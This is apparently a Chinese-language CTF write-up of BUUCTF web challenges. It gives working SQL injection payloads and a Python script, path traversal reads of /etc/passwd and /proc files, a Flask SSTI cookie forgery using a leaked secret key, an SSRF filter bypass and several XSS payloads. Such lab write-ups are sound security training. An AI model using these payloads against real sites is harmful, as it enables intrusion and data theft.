靶机都在BUUCTF上。
【第一章 web入门】
举足轻重的信息收集
常见的收集
手工只找到了robots.txt,剩下两个是敏感泄露文件。
- robots.txt
- index.php~
- .index.php.swp
粗心的小李
scrabble
CTF中的SQL注入
SQL注入-1
id=3提示加入参数tips=1,输出查询语句:
select * from notes where id ='3'测试了一下,完全没有WAF,应该是联合查询,尝试联合查询:
id=-1%27union%20select%201,2,3%23&tips=1
注意这里只能用%23,不能用#,否则无法正常值注入,因为在提交的时候,#并没有通过url编码进行转义。
看到回显是23,接下来注入就比较简单了。
-1%27%20union%20select%201,(select%20group_concat(distinct%20TABLE_SCHEMA)%20from%20information_schema.tables),3%23
查表:
-1%27%20union%20select%201,(select%20group_concat(distinct%20TABLE_NAME)%20from%20information_schema.tables%20where%20table_schema%3d'note'),3%23
读字段:
-1%27%20union%20select%201,(select%20group_concat(distinct%20COLUMN_NAME)%20from%20information_schema.columns%20where%20table_schema%3d'note'%20and%20table_name%3d'fl4g'),3%23
读字段内容:
-1%27%20union%20select%201,(select%20*%20from%20note.fl4g),3%23
SQL注入-2
脚本:
import requests
url = "http://ef016835-6405-4397-b459-3b902127f1ed.node3.buuoj.cn/login.php?tips=1"
# p = 'SELECT database()'
# p = "SELECT(group_concat(table_name))FROM(information_schema.tables)WHERE(table_schema)LIKE('note')"
# p = "SELECT(group_concat(column_name))FROM(information_schema.columns)WHERE(table_name)LIKE('fl4g')"
p = "SELECT(flag)FROM(note.fl4g)"
admin = "admin' and updatexml(1,concat(0x7e,({}),0x7e),1);#".format(p)
payload = {'name': admin, 'pass': '1'}
files = []
headers = {}
response = requests.request("POST", url, headers=headers, data=payload, files=files)
print(response.text)
后续更新:这部分的正解应该是时间盲注。
任意文件读取漏洞
afr_1
本来以为是关键词过滤,后来才发现是文件有die函数,直接用filter文件流读取。
?p=php://filter/read=convert.base64-encode/resource=flag
afr_2
nginx 文件配置错误,访问/img../穿越目录获得flag。
(一直尝试在/..穿越目录)
afr_3
尝试插入..报错
[Errno 2] No such file or directory: '/home/nu11111111l/articles/article../'穿越目录
/article?name=../../../etc/passwd这里用到了Linux下的proc文件系统,即/proc,每个进程以数字命名,其中environ文件存储环境变量。
读文件:
/article?name=../../../proc/1/environ
这里的flag尝试提交失败,猜测应该不是这样做的,但是也没有找到思路,就去看了一下wp,感觉思路完全没对。
wp是查看/proc/self/cmdline:
/proc/$pid/ 可以获取指定进程的信息,但是如果某个进程想获取到自身的信息且不知道$pid时,可以通过访问/proc/self来查看文件,此时等价于/proc/$pid。
/article?name=../../../proc/self/cmdline得到回显;
python server.py查看server.py:
/article?name=../../../proc/self/cwd/server.py可以看见是flask模板,且调用了flag.py以及key.py。
server.py:
import os
from flask import ( Flask, render_template, request, url_for, redirect, session, render_template_string )
from flask_session import Session
app = Flask(__name__)
execfile('flag.py')
execfile('key.py')
FLAG = flag
app.secret_key = key
@app.route("/n1page", methods=["GET", "POST"])
def n1page():
if request.method != "POST":
return redirect(url_for("index"))
n1code = request.form.get("n1code") or None
if n1code is not None:
n1code = n1code.replace(".", "").replace("_", "").replace("{","").replace("}","")
if "n1code" not in session or session['n1code'] is None:
session['n1code'] = n1code
template = None
if session['n1code'] is not None:
template = '''<h1>N1 Page</h1> <div class="row> <div class="col-md-6 col-md-offset-3 center"> Hello : %s, why you don't look at our <a href='/article?name=article'>article</a>? </div> </div> ''' % session['n1code']
session['n1code'] = None
return render_template_string(template)
@app.route("/", methods=["GET"])
def index():
return render_template("main.html")
@app.route('/article', methods=['GET'])
def article():
error = 0
if 'name' in request.args:
page = request.args.get('name')
else:
page = 'article'
if page.find('flag')>=0:
page = 'notallowed.txt'
try:
template = open('/home/nu11111111l/articles/{}'.format(page)).read()
except Exception as e:
template = e
return render_template('article.html', template=template)
if __name__ == "__main__":
app.run(host='0.0.0.0', debug=False)其中这server.py部分代码存在SSTI cookie 注入。
if session['n1code'] is not None:
template = '''<h1>N1 Page</h1> <div class="row> <div class="col-md-6 col-md-offset-3 center"> Hello : %s, why you don't look at our <a href='/article?name=article'>article</a>? </div> </div> ''' % session['n1code']
session['n1code'] = None读取flag.py时发现提示没有权限,有两种可能:过滤关键词或者是没有权限。测试了一下其他包含flag关键词的字段发现都没有权限,应该是存在关键词过滤(后来发现傻逼了,源码给了)。
key.py:
#!/usr/bin/python key = 'Drmhze6EPcv0fN_81Bj-nA'查看 Cookie Session:
用 Flask Session Cookie Decoder/Encoder 解密
于是使用payload,尝试读取flag.py:
python3 flask_session_cookie_manager3.py encode -t "{'n1code':'{{[].__class__.__mro__[1].__subclasses__()[40]('/flag.py').read()}}'}" -s 'Drmhze6EPcv0fN_81Bj-nA'报了语法错误的报错,于是尝试转义:
python3 flask_session_cookie_manager3.py encode -t "{'n1code':'{{[].__class__.__mro__[1].__subclasses__()[40](\'flag.py\').read()}}'}" -s 'Drmhze6EPcv0fN_81Bj-nA'
eyJuMWNvZGUiOiJ7e1tdLl9fY2xhc3NfXy5fX21yb19fWzFdLl9fc3ViY2xhc3Nlc19fKClbNDBdKCdmbGFnLnB5JykucmVhZCgpfX0ifQ.X9D_Zw.w_83uqm3Mo7WIsTlt7QFPqtmffA
[第二章 web进阶]
SSRF 漏洞
SSRF Training
<?php
highlight_file(__FILE__);
function check_inner_ip($url)
{
$match_result=preg_match('/^(http|https)?:\/\/.*(\/)?.*$/',$url);
if (!$match_result)
{
die('url fomat error');
}
try
{
$url_parse=parse_url($url);
}
catch(Exception $e)
{
die('url fomat error');
return false;
}
$hostname=$url_parse['host'];
$ip=gethostbyname($hostname);
$int_ip=ip2long($ip);
return ip2long('127.0.0.0')>>24 == $int_ip>>24 || ip2long('10.0.0.0')>>24 == $int_ip>>24 || ip2long('172.16.0.0')>>20 == $int_ip>>20 || ip2long('192.168.0.0')>>16 == $int_ip>>16;
}
function safe_request_url($url)
{
if (check_inner_ip($url))
{
echo $url.' is inner ip';
}
else
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
$output = curl_exec($ch);
$result_info = curl_getinfo($ch);
if ($result_info['redirect_url'])
{
safe_request_url($result_info['redirect_url']);
}
curl_close($ch);
var_dump($output);
}
}
$url = $_GET['url'];
if(!empty($url)){
safe_request_url($url);
}
?>正则匹配:
$match_result=preg_match('/^(http|https)?:\/\/.*(\/)?.*$/',$url);写一个脚本测试:
<?php
$url = 'http://a:127.0.0.1:80@hostname/path?arg=value#anchor';
print_r(parse_url($url));
echo parse_url($url, PHP_URL_PATH);回显:
Array
(
[scheme] => http
[host] => hostname
[user] => a
[pass] => 127.0.0.1:80
[path] => /path
[query] => arg=value
[fragment] => anchor
)
/pathcheck检测到的值为[‘host’]:www.baidu.com,而curl抓到的值为127.0.0.1,从而进行绕过。
http://a:@127.0.0.1:80@www.baidu.com/flag.phpXSS的魔力
XSS闯关
payload1:
?username=<script>alert(1);</script>payload2:
XSS语句已经在script中,直接闭合后alert
?username=xss%27;alert(1);//payload3:
DOMXSS,插入img
?username=xss<img%20onerror=alert(1)%20src=1>payload4:
js跳转,使用javascript伪协议
?jumpUrl=javascript:alert()payload5:
表单自动提交,action可控,提交到伪协议。
?action=javascript:alert()&autosubmit=1payload6:
angular二次渲染导致XSS:
?username={{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}